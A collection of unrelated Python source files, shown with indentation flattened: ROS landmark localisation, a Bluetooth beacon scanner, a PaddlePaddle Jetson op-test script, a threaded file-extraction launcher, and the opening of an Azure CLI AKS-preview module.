rospy.logerr(repr(why))
except Exception as why:
rospy.logfatal("LRS Crash Recovery System halted!")
def daemon_worker(self):
rospy.loginfo("Landmark Recognition System waiting for initialization...")
try:
rospy.Subscriber(
"/ar_pose_marker", AlvarMarkers, lambda p: self.commit(p.markers),
)
rospy.Subscriber(
self.config["odometry_topic"], Odometry, self.update_pose,
)
rospy.wait_for_message(self.config["odometry_topic"], Odometry)
# Save starting point and rcp pose for that
if not self.recovered:
self.dictionary[-1].observed(
self.pose[0], self.pose[1],
)
else:
rospy.loginfo("Recovered from backup file.")
rospy.wait_for_message("/ar_pose_marker", AlvarMarkers)
while not rospy.core.is_shutdown():
try:
if self.has_landmarks():
px, py = self.pose
for m_id, m in self.dictionary.items():
a, _, _ = m.loc()
x, y = m.kloc()
if a > 0:
m.update_distance((px, py))
if m_id != -1 and a == 1 and not m.logged:
rospy.loginfo(
"Locked on Marker {} -> ({}, {})".format(m_id, x, y)
)
m.logged = True
# * Calculate Transformation Matrix
if self.visible_landmarks > 0:
# Sort landmarks
landmarks = [v for k, v in self.dictionary.items()]
landmarks = sorted(
landmarks,
key=lambda m: (
m.visible_flag,
m.accuracy(),
-m.distance_to_robot,
),
reverse=True,
)
# Remove the ones where there is no observed position or not accurate
landmarks = [
l
for l in landmarks
if len(l.observed_positions) > 0 and l.accuracy() >= 0.8
]
if len(landmarks) < 2:
continue
# Get best two landmarks
p1_m, p2_m = landmarks[:2]
p1_fr0, p1_fr1 = p1_m.loc(True), p1_m.kloc(True)
p2_fr0, p2_fr1 = p2_m.loc(True), p2_m.kloc(True)
# If we have only 2 landmarks then create 2 new points between these two landmarks
if len(landmarks) == 2:
md1_fr0 = np.array(
[
p1_fr0[0] + (1 / 3) * (p2_fr0[0] - p1_fr0[0]),
p1_fr0[1] + (1 / 3) * (p2_fr0[1] - p1_fr0[1]),
1,
]
)
md1_fr1 = np.array(
[
p1_fr1[0] + (1 / 3) * (p2_fr1[0] - p1_fr1[0]),
p1_fr1[1] + (1 / 3) * (p2_fr1[1] - p1_fr1[1]),
1,
]
)
md2_fr0 = np.array(
[
p1_fr0[0] + (2 / 3) * (p2_fr0[0] - p1_fr0[0]),
p1_fr0[1] + (2 / 3) * (p2_fr0[1] - p1_fr0[1]),
1,
]
)
md2_fr1 = np.array(
[
p1_fr1[0] + (2 / 3) * (p2_fr1[0] - p1_fr1[0]),
p1_fr1[1] + (2 / 3) * (p2_fr1[1] - p1_fr1[1]),
1,
]
)
elif len(landmarks) == 3:
# If there is 3 landmarks then create a midpoint between two best landmarks
md1_m = landmarks[2]
md1_fr0, md1_fr1 = md1_m.loc(True), md1_m.kloc(True)
md2_fr0 = np.array(
[
p1_fr0[0] + (1 / 2) * (p2_fr0[0] - p1_fr0[0]),
p1_fr0[1] + (1 / 2) * (p2_fr0[1] - p1_fr0[1]),
1,
]
)
md2_fr1 = np.array(
[
p1_fr1[0] + (1 / 2) * (p2_fr1[0] - p1_fr1[0]),
p1_fr1[1] + (1 / 2) * (p2_fr1[1] - p1_fr1[1]),
1,
]
)
else:
md1_m = landmarks[2]
md1_fr0, md1_fr1 = md1_m.loc(True), md1_m.kloc(True)
md2_m = landmarks[3]
md2_fr0, md2_fr1 = md2_m.loc(True), md2_m.kloc(True)
sp_x, sp_y, sp_t, sp_s = sp.symbols("sp_x sp_y sp_t sp_s")
sp_M_trans = sp.Matrix(
(
(sp_s * sp.cos(sp_t), -sp.sin(sp_t), 0),
(sp.sin(sp_t), sp_s * sp.cos(sp_t), 0),
(sp_x, sp_y, 1),
)
)
sp_eq0 = sp.Matrix(1, 3, p1_fr0) * sp_M_trans
sp_eq1 = sp.Matrix(1, 3, p2_fr0) * sp_M_trans
sp_eq2 = sp.Matrix(1, 3, md1_fr0) * sp_M_trans
sp_eq3 = sp.Matrix(1, 3, md2_fr0) * sp_M_trans
sp_A = sp.Matrix((sp_eq0, sp_eq1, sp_eq2, sp_eq3))
b_np = np.array((p1_fr1, p2_fr1, md1_fr1, md2_fr1))
delta = lambda result: np.sum(
np.abs(np.array(result) - b_np)
)
f = lambda args: delta(
sp_A.evalf(
subs={
sp_x: args[0],
sp_y: args[1],
sp_t: args[2],
sp_s: args[3],
}
)
)
result = minimize(
f, [0, 0, 0, 1], method="L-BFGS-B", tol=1e-5
)
if result.success:
self.update_MT(
np.array(
[
[
result.x[3] * math.cos(result.x[2]),
-math.sin(result.x[2]),
0,
],
[
math.sin(result.x[2]),
result.x[3] * math.cos(result.x[2]),
0,
],
[result.x[0], result.x[1], 1],
]
),
f(result.x),
)
rospy.rostime.wallsleep(1.5)
except Exception as why:
rospy.logerr("Error in LRS... Recovering...")
rospy.logerr(repr(why))
except Exception as why:
rospy.logfatal("Landmark Recognition System halted!")
def update_MT(self, MT=None, error=None):
if not MT is None:
if self.M_TRANS is None:
self.M_TRANS = [(error, time.time(), MT)]
elif len(self.M_TRANS) < self.LIMIT:
self.M_TRANS.append((error, time.time(), MT))
else:
self.M_TRANS.sort(key=lambda x: -x[0])
if error < self.M_TRANS[0][0]:
self.M_TRANS.pop(0)
self.M_TRANS.append((error, time.time(), MT))
self.M_TRANS.sort(key=lambda x: x[0])
groups = [[self.M_TRANS[0]]]
for x in self.M_TRANS[1:]:
if abs(x[0] - groups[-1][-1][0]) <= 0.1:
groups[-1].append(x)
else:
groups.append([x])
best = sorted(groups[0], key=lambda x: -x[1])
self.driver_instance.M_T = best[0][2]
self.driver_instance.M_T_stats = (best[0][0], best[0][1])
def theta_df(self, unit1, unit2):
unit1 = math.degrees(unit1)
unit2 = math.degrees(unit2)
phi = abs(unit2 - unit1) % 360
sign = 1
# used to calculate sign
if not (
(unit1 - unit2 >= 0 and unit1 - unit2 <= 180)
or (unit1 - unit2 <= -180 and unit1 - unit2 >= -360)
):
sign = -1
if phi > 180:
result = 360 - phi
else:
result = phi
return math.radians(result * sign)
def update_pose(self, payload):
x = payload.pose.pose.position.x
y = payload.pose.pose.position.y
self.pose = x, y
def commit(self, markers):
visible_ids = [marker.id for marker in markers]
self.visible_landmarks = len(visible_ids)
for m_id, m in self.dictionary.items():
if not m_id in visible_ids:
m.visible(False)
for marker in markers:
m_id = marker.id
x = marker.pose.pose.position.x
y = marker.pose.pose.position.y
if m_id in self.dictionary:
self.dictionary[m_id].observed(x, y)
self.dictionary[m_id].visible(True)
def has_landmarks(self):
for _, m in self.dictionary.items():
if m.accuracy() == 1 and m.id != -1:
return True
return False
|
ScanBeaconUtility.py | # https://github.com/bowdentheo/BLE-Beacon-Scanner
class Beacon_Obj(object):
mac = str()
rssi = int()
uuid = str()
tx_power = int()
major = int()
minor = int()
tipo = str()
empresa = str()
def __init__(self, mac: str, rssi: int, uuid: str, tx: int, maj: int, min: int, tip: str, company: str):
self.mac = mac
self.rssi = rssi
self.uuid = uuid
self.tx_power = tx
self.major = maj
self.minor = min
self.tipo = tip
self.empresa = company
def getJson(self):
return self.__dict__
class beacontools:
import sys
import struct
import bluetooth._bluetooth as bluez
from multiprocessing import Process, Queue
import time
OGF_LE_CTL = 0x08
OCF_LE_SET_SCAN_ENABLE = 0x000C
BEACONs_SCANNED = dict()
def __init__(self, dev_id, time_use):
self.proc = self.Process(target=self.__continue_process)
self.time_use = time_use
try:
self.sock = self.bluez.hci_open_dev(dev_id)
print("\n *** Looking for BLE Beacons ***\n")
except:
self.sock = None
print("Error accessing bluetooth")
self.queue = self.Queue()
def hci_enable_le_scan(self):
if self.sock is not None:
self.hci_toggle_le_scan(0x01)
def hci_disable_le_scan(self):
if self.sock is not None:
self.hci_toggle_le_scan(0x00)
def hci_toggle_le_scan(self, enable):
if self.sock is not None:
cmd_pkt = self.struct.pack("<BB", enable, 0x00)
self.bluez.hci_send_cmd(self.sock, self.OGF_LE_CTL, self.OCF_LE_SET_SCAN_ENABLE, cmd_pkt)
def packetToString(self, packet):
"""
Returns the string representation of a raw HCI packet.
"""
if self.sys.version_info > (3, 0):
return ''.join('%02x' % self.struct.unpack("B", bytes([x]))[0] for x in packet)
else:
return ''.join('%02x' % self.struct.unpack("B", x)[0] for x in packet)
def parse_events(self, loop_count=100):
global prefix
if self.sock is not None:
# old_filter = self.sock.getsockopt( self.bluez.SOL_HCI, self.bluez.HCI_FILTER, 14)
flt = self.bluez.hci_filter_new()
self.bluez.hci_filter_all_events(flt)
self.bluez.hci_filter_set_ptype(flt, self.bluez.HCI_EVENT_PKT)
self.sock.setsockopt(self.bluez.SOL_HCI, self.bluez.HCI_FILTER, flt)
results = []
for i in range(0, loop_count):
packet = self.sock.recv(255)
# ptype, event, plen = self.struct.unpack("BBB", packet[:3])
packetOffset = 0
dataString = self.packetToString(packet)
"""
If the bluetooth device is an beacon then show the beacon.
"""
# print (dataString)
if (dataString[34:42] == '0303aafe') and (dataString[44:50] == '16AAFE'):
"""
Selects parts of the bluetooth packets.
"""
broadcastType = dataString[50:52]
if broadcastType == '00':
type = "Eddystone UID"
namespace = dataString[54:74].upper()
instance = dataString[74:86].upper()
resultsArray = [
{"type": type, "namespace": namespace, "instance": instance}]
return resultsArray
elif broadcastType == '10':
type = "Eddystone URL"
urlprefix = dataString[54:56]
if urlprefix == '00':
prefix = 'http://www.'
elif urlprefix == '01':
prefix = 'https://www.'
elif urlprefix == '02':
prefix = 'http://'
elif urlprefix == '03':
prefix = 'https://'
hexUrl = dataString[56:][:-2]
if self.sys.version_info[0] == 3:
url = prefix + bytes.fromhex(hexUrl).decode('utf-8')
rssi, = self.struct.unpack("b", bytes([packet[packetOffset - 1]]))
else:
url = prefix + hexUrl.decode("hex")
rssi, = self.struct.unpack("b", packet[packetOffset - 1])
resultsArray = [{"type": type, "url": url}]
return resultsArray
elif broadcastType == '20':
type = "Eddystone TLM"
resultsArray = [{"type": type}]
return resultsArray
elif broadcastType == '30':
type = "Eddystone EID"
resultsArray = [{"type": type}]
return resultsArray
elif broadcastType == '40':
type = "Eddystone RESERVED"
resultsArray = [{"type": type}]
return resultsArray
if dataString[38:46] == '4c000215':
"""
Selects parts of the bluetooth packets.
"""
type = "iBeacon"
uuid = dataString[46:54] + "-" + dataString[54:58] + "-" + dataString[58:62] + "-" + dataString[
62:66] + "-" + dataString[
66:78]
major = dataString[78:82]
minor = dataString[82:86]
majorVal = int("".join(major.split()[::-1]), 16)
minorVal = int("".join(minor.split()[::-1]), 16)
"""
Organises Mac Address to display properly
"""
scrambledAddress = dataString[14:26]
fixStructure = iter(
"".join(reversed([scrambledAddress[i:i + 2] for i in range(0, len(scrambledAddress), 2)])))
macAddress = ':'.join(a + b for a, b in zip(fixStructure, fixStructure))
if self.sys.version_info[0] == 3:
rssi, = self.struct.unpack("b", bytes([packet[packetOffset - 1]]))
else:
rssi, = self.struct.unpack("b", packet[packetOffset - 1])
resultsArray = [{"type": type, "uuid": uuid, "major": majorVal, "minor": minorVal, "rssi": rssi,
"macAddress": macAddress}]
for item in resultsArray:
beacon = Beacon_Obj(item['macAddress'], item['rssi'], item['uuid'], 0, item['major'],
item['minor'], item['type'], item['uuid'][0:8])
self.BEACONs_SCANNED[beacon.uuid] = beacon
return resultsArray
return results
return []
def __continue_process(self):
self.time_sleep = self.time.time()
while True:
self.parse_events(10)
self.time.sleep(0.25)
if (int(abs(self.time_sleep - self.time.time()) * 100) / 100) >= self.time_use:
self.queue.put(self.BEACONs_SCANNED)
self.BEACONs_SCANNED = dict()
self.time_sleep = self.time.time()
def start_continue_process(self):
self.hci_enable_le_scan()
self.proc.start()
def detener_continue_process(self):
self.proc.terminate()
self.proc.join()
def get_beacons(self):
return self.queue.get()
class Beacon_FCV:
from multiprocessing import Process, Queue
import time
import numpy as np
tiempo_procesar = 5
queue = Queue()
size_vector = 10
HISTORY_BEACON_SCAN = dict()
BEACONs_SCANNED = dict()
HISTORY_MORE_NEAR_BEACON = ["" for _ in range(
size_vector)] # Guardo un historico de todos los uuid mas cercanos en cada periodo de escaneo
def __init__(self, dev_id, time_use):
self.scan_beacon = beacontools(dev_id, time_use)
self.scan_beacon.start_continue_process()
self.tiempo_procesar = time_use
self.proc = self.Process(target=self.__procesar_escaneo)
self.proc.start()
def __vector_vacio(self, size_vector=10):
return [int(i) for i in list(self.np.zeros(size_vector))]
@staticmethod
def __diff(list1, list2):
c = set(list1).union(set(list2)) # or c = set(list1) | set(list2)
d = set(list1).intersection(set(list2)) # or d = set(list1) & set(list2)
return list(c - d)
def __procesar_escaneo(self):
while True:
self.BEACONs_SCANNED = self.scan_beacon.get_beacons()
# for uuid, beacon_class in self.BEACONs_SCANNED.items():
# print(beacon_class.getJson())
mas_cercano = {'rssi': -150}
for uuid, beacon_class in self.BEACONs_SCANNED.items():
if mas_cercano['rssi'] < beacon_class.rssi:
mas_cercano['rssi'] = beacon_class.rssi
mas_cercano['uuid'] = uuid
mas_cercano['class'] = beacon_class
if not uuid in self.HISTORY_BEACON_SCAN:
OBJ = dict()
OBJ['beacon'] = beacon_class
OBJ['history'] = self.__vector_vacio(self.size_vector)
self.HISTORY_BEACON_SCAN[uuid] = OBJ
else:
historico = self.HISTORY_BEACON_SCAN[uuid]['history']
for i in range(self.size_vector - 1, 0, -1):
historico[i] = historico[i - 1]
historico[0] = beacon_class.rssi
self.HISTORY_BEACON_SCAN[uuid]['history'] = historico
# print(beacon_class.getJson())
for i in range(self.size_vector - 1, 0, -1):
self.HISTORY_MORE_NEAR_BEACON[i] = self.HISTORY_MORE_NEAR_BEACON[i - 1]
self.HISTORY_MORE_NEAR_BEACON[0] = mas_cercano['uuid'] if len(mas_cercano) > 1 else ""
uuid_beacons_this_scan = [uuid for uuid in self.BEACONs_SCANNED]
all_uuid_beacons_scan = [uuid for uuid in self.HISTORY_BEACON_SCAN]
for uuid_no_vistos_en_este_escaneo in self.__diff(all_uuid_beacons_scan, uuid_beacons_this_scan):
historico = self.HISTORY_BEACON_SCAN[uuid_no_vistos_en_este_escaneo]['history']
for i in range(self.size_vector - 1, 0, -1):
historico[i] = historico[i - 1]
historico[0] = 0
self.HISTORY_BEACON_SCAN[uuid_no_vistos_en_este_escaneo]['history'] = historico
respuesta = (False, "", 0)
if self.HISTORY_MORE_NEAR_BEACON[0] != "":
if self.HISTORY_MORE_NEAR_BEACON[0] == self.HISTORY_MORE_NEAR_BEACON[1]:
respuesta = (True, self.HISTORY_MORE_NEAR_BEACON[0], mas_cercano['rssi'])
else:
respuesta = (False, self.HISTORY_MORE_NEAR_BEACON[0], mas_cercano['rssi'])
self.queue.put(respuesta)
self.time.sleep(self.tiempo_procesar)
def terminar_procesos_beacon(self):
self.scan_beacon.detener_continue_process()
self.proc.terminate()
def get_history(self):
return self.HISTORY_BEACON_SCAN
def get_scan_actual(self):
return self.queue.get()
|
jetson_infer_op.py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import os
import math
import argparse
from threading import Thread
# some particular ops
black_list = [
# special op
'test_custom_relu_op_setup',
'test_custom_relu_op_jit',
'test_python_operator_overriding',
'test_c_comm_init_all_op',
'test_c_embedding_op',
# train op
'test_imperative_optimizer',
'test_imperative_optimizer_v2',
'test_momentum_op',
'test_sgd_op',
'test_sgd_op_bf16',
'test_warpctc_op',
# sync op
'test_sync_batch_norm_op',
# case too large
'test_reduce_op',
'test_transpose_op'
]
op_diff_list = [
# diff<1E-7,it's right
'test_elementwise_mul_op'
]
def parse_arguments():
"""
:return:
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--shell_name',
type=str,
default='get_op_list.sh',
help='please input right name')
parser.add_argument(
'--op_list_file',
type=str,
default='list_op.txt',
help='please input right name')
return parser.parse_args()
def search_file(file_name, path, file_path):
"""
:param file_name:target
:param path: to search this path
:param file_path: result
:return:
"""
for item in os.listdir(path):
if os.path.isdir(os.path.join(path, item)):
search_file(file_name, os.path.join(path, item), file_path)
else:
if file_name in item:
file_path.append(os.path.join(path, file_name))
def get_prefix(line, end_char='d'):
"""
:param line: string_demo
:param end_char: copy the prefix of string_demo until end_char
:return: prefix
"""
i = 0
prefix = ''
while (line[i] != end_char):
prefix += line[i]
i += 1
return prefix
def add_import_skip_return(file, pattern_import, pattern_skip, pattern_return):
"""
:param file: the file need to be changed
:param pattern_import: import skip
:param pattern_skip: @skip
:param pattern_return: add return
:return:
"""
pattern_1 = re.compile(pattern_import)
pattern_2 = re.compile(pattern_skip)
pattern_3 = re.compile(pattern_return)
file_data = ""
# change file
with open(file, "r", encoding="utf-8") as f:
for line in f:
# add import skip_check_grad_ci
match_obj = pattern_1.search(line)
if match_obj is not None:
line = line[:-1] + ", skip_check_grad_ci\n"
print("### add import skip_check_grad_ci ####")
# add @skip_check_grad_ci
match_obj = pattern_2.search(line)
if match_obj is not None:
file_data += "@skip_check_grad_ci(reason='jetson do n0t neeed this !')\n"
print("### add @skip_check_grad_ci ####")
# delete test_grad_output
match_obj = pattern_3.search(line)
if match_obj is not None:
file_data += line
file_data += get_prefix(line)
file_data += " return\n"
print("### add return for function ####")
continue
file_data += line
# save file
with open(file, "w", encoding="utf-8") as f:
f.write(file_data)
def get_op_list(op_list_file='list_op.txt'):
"""
:param op_list_file: op list file
:return: list of op
"""
op_list = []
with open(op_list_file, "r", encoding="utf-8") as f:
for line in f:
if line in black_list:
continue
# delete /n
op_list.append(line[:-1])
return op_list
def set_diff_value(file, atol="1e-5", inplace_atol="1e-7"):
"""
:param file: refer to op_test.py
:param atol: refer to op_test.py
:param inplace_atol:
:return:
"""
os.system("sed -i 's/self.check_output(/self\.check_output\(atol=" + atol +
",inplace_atol=" + inplace_atol + ",/g\' " + file)
def change_op_file(start=0, end=0, op_list_file='list_op.txt', path='.'):
"""
:param start:
:param end:
:param op_list_file: op_list
:param path: just the file in this path
:return:
"""
test_op_list = get_op_list(op_list_file)
file_path = []
for id in range(start, end):
item = test_op_list[id]
print(id, ":", item)
search_file(item + '.py', os.path.abspath(path), file_path)
if len(file_path) == 0:
print("'", item, "' is not a python file!")
continue
file_with_path = file_path[0]
# pattern
pattern_import = ".*import OpTest.*"
pattern_skip = "^class .*\(OpTest\):$"
pattern_return = "def test.*grad.*\):$"
# change file
add_import_skip_return(file_with_path, pattern_import, pattern_skip,
pattern_return)
# op_diff
if item in op_diff_list:
set_diff_value(file_with_path)
file_path.clear()
def run_multi_thread(list_file, thread_num=4):
"""
:param list_file:
:param thread_num:
:return:
"""
length = len(get_op_list(list_file))
thread_list = []
start = 0
end = 0
for item in range(thread_num):
# set argument
start = math.floor(item / thread_num * length)
end = math.floor((item + 1) / thread_num * length)
print("thread num-", item, ":", start, end)
thread = Thread(target=change_op_file, args=(start, end))
thread_list.append(thread)
# start a thread
thread.start()
# wait all thread
for item in thread_list:
item.join()
# add a flag
with open("flag_change_file.txt", "w", encoding="utf-8") as f:
f.write("change successfully!")
print("------change successfully!-------")
def transform_list_to_str(list_op):
"""
:param list_op:
:return:
"""
res = ""
for item in list_op:
tmp = "^" + item + "$|"
res += tmp
return res[:-1]
def run_file_change(op_list_file):
"""
if file has changed, the file should not be changed again.
:param op_list_file:
:return:
"""
if (os.path.exists("flag_change_file.txt")):
print(
"-----maybe op_file has changed, so don't need to change again------"
)
else:
run_multi_thread(op_list_file)
def run_test_first(op_list_file):
"""
run all op test.
:param op_list_file:
:return:
"""
old_list = get_op_list(op_list_file)
new_list = filter(lambda x: x not in black_list, old_list)
op_test = transform_list_to_str(new_list)
os.system("ctest -R \"(" + op_test + ")\" >& test_op_log.txt")
def run_test_second():
"""
run failed op again.
:return:
"""
os.system(
"sed -n '/(Failed)$/p' test_op_log.txt | awk '{print $3}' >& rerun_op.txt"
)
rerun_list = get_op_list('rerun_op.txt')
if (len(rerun_list)):
print("-------there are " + str(len(rerun_list)) +
" op(s) need to rerun!!!-------")
for failed_op in rerun_list:
os.system("ctest -R \"(" + failed_op + ")\" ")
else:
print("-------all op passed successfully!!!-------")
if __name__ == '__main__':
arg = parse_arguments()
print("------start get op list!------")
os.system("bash " + arg.shell_name + " " + arg.op_list_file)
print("------start change op file!------")
run_file_change(arg.op_list_file)
print("------start run op test first!------")
run_test_first(arg.op_list_file)
print("------start run failed_op test!------")
run_test_second()
print("------do well!------")
|
mod_file.py | import os
from lib import status
from src import video
from src import extract
import threading
import time
#limit max threads
max_threads = 5
#function to register a thread
#wait until a new thread is avaible, then start a new thread
def thread_get(FILE, PATH):
while True:
if threading.active_count() <= max_threads:
t = threading.Thread(target=extract.get, args=(FILE, PATH))
t.daemon = True
t.start()
break
else:
time.sleep(0.1)
def get(FILE, PATH):
if os.path.exists(FILE):
f = open(FILE, 'r')
line = f.readline()
while line:
if len(line) > 1:
thread_get(line, PATH)
line = f.readline()
f.close()
else:
print("%s File not found" % status.get("error"))
return (-1)
|
custom.py | # pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
import colorama # pylint: disable=import-error
import yaml # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
InvalidArgumentValueError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import (
get_mgmt_service_client,
get_subscription_id,
)
from azure.cli.core.util import (
get_file_json,
in_cloud_console,
sdk_no_wait,
shell_safe_json_parse,
)
from azure.graphrbac.models import (
ApplicationCreateParameters,
KeyCredential,
PasswordCredential,
ServicePrincipalCreateParameters,
)
from dateutil.parser import parse # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_pass
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
from six.moves.urllib.error import URLError # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azext_aks_preview._client_factory import CUSTOM_MGMT_AKS_PREVIEW
from ._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_snapshots_client,
cf_storage,
get_auth_management_client,
get_graph_rbac_management_client,
get_msi_client,
get_resource_by_name,
)
from ._consts import (
ADDONS,
ADDONS_DESCRIPTIONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_AZURE_POLICY_ADDON_NAME,
CONST_CONFCOM_ADDON_NAME,
CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SCALE_SET_PRIORITY_SPOT,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
)
from ._helpers import (
_trim_fqdn_name_containing_hcp,
)
from ._podidentity import (
_ensure_managed_identity_operator_permission,
_ensure_pod_identity_addon_is_enabled,
_fill_defaults_for_pod_identity_profile,
_update_addon_pod_identity,
)
from ._resourcegroup import get_rg_location
from ._roleassignments import (
add_role_assignment,
build_role_scope,
create_role_assignment,
resolve_object_id,
resolve_role_id,
)
from .addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
enable_addons,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
sanitize_loganalytics_ws_resource_id,
)
from .maintenanceconfiguration import (
aks_maintenanceconfiguration_update_internal,
)
from .vendored_sdks.azure_mgmt_preview_aks.v2021_11_01_preview.models import (
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
CreationData,
KubeletConfig,
LinuxOSConfig,
ManagedClusterAddonProfile,
ManagedClusterHTTPProxyConfig,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
PowerState,
Snapshot,
SysctlConfig,
UserAssignedIdentity,
)
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
